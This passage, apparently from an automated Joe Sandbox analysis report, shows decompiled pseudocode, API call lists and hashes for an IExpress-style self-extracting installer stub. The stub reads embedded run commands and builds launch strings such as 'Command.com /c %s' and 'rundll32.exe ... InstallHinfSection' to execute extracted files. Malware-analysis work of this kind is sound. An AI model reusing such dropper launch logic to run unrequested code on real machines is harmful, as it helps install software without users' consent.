                                                                        											}
                                                                        											 *0x3d9124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0x3d9a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0x3d8a20;
                                                                        										if( *0x3d8a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E003D202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E003D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0x3d8c42;
                                                                        									if( *0x3d8c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0x3d8a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E003D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E003D468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E003D1781( &_v276, 0x104, _t130, 0x3d8c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E003D468F(_t130, 0x3d9a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D3C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 003D3CDC
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,003D8C42), ref: 003D3D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 003D3E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,003D8C42), ref: 003D3EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,003D8C42), ref: 003D3F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,003D8C42), ref: 003D3F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,003D8C42), ref: 003D3F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,003D8C42), ref: 003D3F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,003D8C42), ref: 003D3F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,003D8C42), ref: 003D3FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                        • API String ID: 1032054927-4257430877
                                                                        • Opcode ID: 9f65d121e77cd66cc92b4be705746909b8f6a501a8fb187f3745434587499bda
                                                                        • Instruction ID: de9338c067b25272c7266e359b193f05b8d4d1388e04db7886c3a4ad30223516
                                                                        • Opcode Fuzzy Hash: 9f65d121e77cd66cc92b4be705746909b8f6a501a8fb187f3745434587499bda
                                                                        • Instruction Fuzzy Hash: 2DB1CD72A093019BD7239F24B845B6B77E9AB84700F11092BFA95DB390DB708E44CB93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph: function at 3d1ae8 (legend: Executed / Not Executed)
                                                                        C-Code - Quality: 82%
                                                                        			E003D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E003D1680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E003D1A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E003D1781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					E003D658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E003D1680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E003D66C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E003D66C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E003D1680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E003D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E003D16B3( &_v1552, 0x400, " ");
                                                                        										E003D16B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E003D2AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E003D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E003D1A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E003D1A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E003D44B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0x3d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x3d1140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0x3d9a34 =  *0x3d9a34 & 0xfffffffb;
                                                                        										if( *0x3d9a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E003D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0x3d9a34 =  *0x3d9a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E003D1680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E003D1680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E003D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x003d1d46
                                                                        0x003d1cc2
                                                                        0x003d1cc2
                                                                        0x003d1ccc
                                                                        0x003d1cce
                                                                        0x003d1cce
                                                                        0x003d1cdb
                                                                        0x003d1ce6
                                                                        0x003d1cee
                                                                        0x003d1cee
                                                                        0x003d1e89
                                                                        0x003d1e91
                                                                        0x003d1e92
                                                                        0x003d1e94
                                                                        0x003d1e97
                                                                        0x003d1ea4
                                                                        0x003d1ea4
                                                                        0x003d1c61
                                                                        0x003d1c07
                                                                        0x003d1bd3
                                                                        0x003d1b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 003D1C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,003D1140,00000000,00000008,?), ref: 003D1CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 003D1D1B
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-1533028066
                                                                        • Opcode ID: 53e8b945a02e5bec41123b95bdb0973a9886abd8a0924b8e555a3088fc9c838c
                                                                        • Instruction ID: bb7dfbcd34bec9bad14868aac5535bce21f418266a9d2003e2ff41b411c9723e
                                                                        • Opcode Fuzzy Hash: 53e8b945a02e5bec41123b95bdb0973a9886abd8a0924b8e555a3088fc9c838c
                                                                        • Instruction Fuzzy Hash: 7EA166B3A002187BEB239B24FC45FFA776AAB45310F140297E955A73C1DBB09E85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 3d597d-3d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3d59dd-3d5a1b GetDiskFreeSpaceA 324->325 326 3d59bb-3d59d8 call 3d44b9 call 3d6285 324->326 328 3d5ba1-3d5bde memset call 3d6285 GetLastError FormatMessageA 325->328 329 3d5a21-3d5a4a MulDiv 325->329 343 3d5c05-3d5c14 call 3d6ce0 326->343 338 3d5be3-3d5bfc call 3d44b9 SetCurrentDirectoryA 328->338 329->328 332 3d5a50-3d5a6c GetVolumeInformationA 329->332 335 3d5a6e-3d5ab0 memset call 3d6285 GetLastError FormatMessageA 332->335 336 3d5ab5-3d5aca SetCurrentDirectoryA 332->336 335->338 340 3d5acc-3d5ad1 336->340 353 3d5c02 338->353 341 3d5ad3-3d5ad8 340->341 342 3d5ae2-3d5ae4 340->342 341->342 346 3d5ada-3d5ae0 341->346 348 3d5ae7-3d5af8 342->348 349 3d5ae6 342->349 346->340 346->342 352 3d5af9-3d5afb 348->352 349->348 355 3d5afd-3d5b03 352->355 356 3d5b05-3d5b08 352->356 354 3d5c04 353->354 354->343 355->352 355->356 357 3d5b0a-3d5b1b call 3d44b9 356->357 358 3d5b20-3d5b27 356->358 357->353 360 3d5b29-3d5b33 358->360 361 3d5b52-3d5b5b 358->361 360->361 363 3d5b35-3d5b50 360->363 364 3d5b62-3d5b6d 361->364 363->364 365 3d5b6f-3d5b74 364->365 366 3d5b76-3d5b7d 364->366 367 3d5b85 365->367 368 3d5b7f-3d5b81 366->368 369 3d5b83 366->369 370 3d5b87-3d5b94 call 3d268b 367->370 371 3d5b96-3d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E003D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0x3d9124 = E003D6285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E003D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0x3d9a34 & 0x00000008;
                                                                        							if(( *0x3d9a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0x3d9a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0x3d9124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E003D268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0x3d9a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0x3d9a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E003D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E003D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E003D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}



































                                                                        0x003d5b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5b03
                                                                        0x003d5b05
                                                                        0x003d5b08
                                                                        0x003d5b20
                                                                        0x003d5b27
                                                                        0x003d5b52
                                                                        0x003d5b52
                                                                        0x003d5b5b
                                                                        0x003d5b62
                                                                        0x003d5b6b
                                                                        0x003d5b6d
                                                                        0x003d5b76
                                                                        0x003d5b7d
                                                                        0x003d5b83
                                                                        0x003d5b7f
                                                                        0x003d5b7f
                                                                        0x003d5b7f
                                                                        0x003d5b6f
                                                                        0x003d5b72
                                                                        0x003d5b72
                                                                        0x003d5b85
                                                                        0x003d5b98
                                                                        0x003d5b9e
                                                                        0x003d5b87
                                                                        0x003d5b8f
                                                                        0x003d5b8f
                                                                        0x00000000
                                                                        0x003d5b85
                                                                        0x003d5b29
                                                                        0x003d5b33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5b35
                                                                        0x003d5b48
                                                                        0x003d5b4a
                                                                        0x00000000
                                                                        0x003d5b4a
                                                                        0x003d5b0f
                                                                        0x003d5b16
                                                                        0x00000000
                                                                        0x003d5b16
                                                                        0x003d5a7c
                                                                        0x003d5a8a
                                                                        0x003d5aa5
                                                                        0x003d5aab
                                                                        0x00000000
                                                                        0x003d59bb
                                                                        0x003d59c0
                                                                        0x003d59c7
                                                                        0x003d59d1
                                                                        0x003d59d6
                                                                        0x003d5c05
                                                                        0x003d5c14
                                                                        0x003d5c14

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003D59A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 003D59AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 003D5A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 003D5A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003D5A64
                                                                        • memset.MSVCRT ref: 003D5A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003D5A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003D5AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 003D5BFC
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
